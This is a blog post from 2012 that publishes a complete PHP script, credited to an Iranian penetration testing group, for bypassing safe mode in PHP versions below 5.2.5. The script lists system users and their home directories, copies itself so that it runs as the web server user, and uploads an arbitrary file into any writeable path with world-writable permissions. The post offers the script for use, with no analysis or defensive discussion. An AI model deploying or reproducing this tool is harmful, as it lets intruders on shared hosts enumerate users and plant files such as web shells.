- Back to Home »
- Safe Mode Bypass , Shell »
- PHP < 5.2.5 Safe mode Bypass
Thursday, May 10, 2012
<?php
########################## WwW.BugReport.ir ###########################################
#
# AmnPardaz Security Research & Penetration Testing Group
#
# Title: PHP < 5.2.5 Safe mode Bypass
# Vendor: http://www.php.net/
################################################## ################################
?>
<html dir="ltr">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>SAFE MODE BYPASS</title>
<style type="text/css" media="screen">
body {
font-size: 10px;
font-family: verdana;
}
INPUT {
BORDER-TOP-WIDTH: 1px; FONT-WEIGHT: bold; BORDER-LEFT-WIDTH: 1px; FONT-SIZE: 10px; BORDER-LEFT-COLOR: #D50428; BACKGROUND: #590009; BORDER-BOTTOM-WIDTH: 1px; BORDER-BOTTOM-COLOR: #D50428; COLOR: #00ff00; BORDER-TOP-COLOR: #D50428; FONT-FAMILY: verdana; BORDER-RIGHT-WIDTH: 1px; BORDER-RIGHT-COLOR: #D50428
}
</style>
</head>
<body dir="ltr" alink="#00ff00" bgcolor="#000000" link="#00c000" text="#008000" vlink="#00c000">
<form method="POST" enctype="multipart/form-data" action="?">
Enter The <A href='?info=1' > Target Path </A>:<BR><BR>
<input type="text" name="target" value="<?php echo $_SERVER['DOCUMENT_ROOT']; ?>" size="50"><BR>*Target must be writeable!<BR><BR>
File Content:<BR><BR>
<input type="file" name="F1" size="50"><BR><BR>
<input type="submit" name="Upload" value="Upload">
</form>
<?php
error_reporting(E_ALL ^ E_NOTICE);
if(isset($_GET['info']) && $_GET['info'] == 1)
{
if (function_exists('posix_getpwuid'))
{
if (isset($_POST['f']) && isset($_POST['l']))
{
$f = intval($_POST['f']);
$l = intval($_POST['l']);
while ($f < $l)
{
$uid = posix_getpwuid($f);
if ($uid)
{
$uid["dir"] = "<a href=\"\">".$uid["dir"]."</a>";
echo join(":",$uid)."<br>";
}
$f++;
}
} else
{
echo '
<form method="POST" action="?info=1">Uid
FROM : <input type="text" name="f" value="1" size="4">
TO : <input type="text" name="l" value="1000" size="4">
<input type="submit" name="Show" value="Show">';
}
} else die("Sorry! Posix Functions are disabled in your box, There is no way to obtain users path! You must enter it manually!");
die();
}
if(isset($_POST['Upload']) && isset($_POST['target']) && $_POST['target'] != "")
{
$MyUid = getmyuid();
$MyUname = get_current_user();
if (function_exists('posix_geteuid'))
{
$HttpdUid = posix_geteuid();
$HttpdInfo = posix_getpwuid($HttpdUid);
$HttpdUname = "(".$HttpdInfo['name'].")";
} else
{
$NewScript = @fopen('bypass.php','w+');
if (!$NewScript)
{
die('Make the Current directory Writeable (Chmod 777) and try again');
} else $HttpdUid = fileowner('bypass.php');
}
if ($MyUid != $HttpdUid)
{
echo "This Script User ($MyUid) and httpd Process User ($HttpdUid) dont match!";
echo " We Will create a copy of this Script with httpd User $HttpdUname
in current directory..."."<BR>";
if (!$NewScript)
{
$NewScript = @fopen('bypass.php','w+');
if (!$NewScript)
{
die('Make the Current directory Writeable (Chmod 777) and try again');
}
}
$Temp = fopen(__FILE__ ,'r');
while (!feof($Temp))
{
$Buffer = fgets($Temp);
fwrite($NewScript,$Buffer);
}
fclose($Temp);
fclose($NewScript);
echo "Please Run <A href='bypass.php'> This </A> Script";
die();
}
$TargetPath = trim($_POST['target']);
$TargetFile = tempnam($TargetPath,"BP");
if (strstr($TargetFile, $TargetPath) == TRUE)
{
echo $TargetFile." Successfully created!<BR>";
} else die("$TargetPath doesnt exist or is not writeable! choose another path!");
if (move_uploaded_file($_FILES['F1']['tmp_name'], $TargetFile))
{
echo "<BR>$TargetFile is valid, and was successfully uploaded.";
} else
{
die("<BR>$TargetFile Could not upload.");
}
chmod($TargetFile , 0777);
}
?>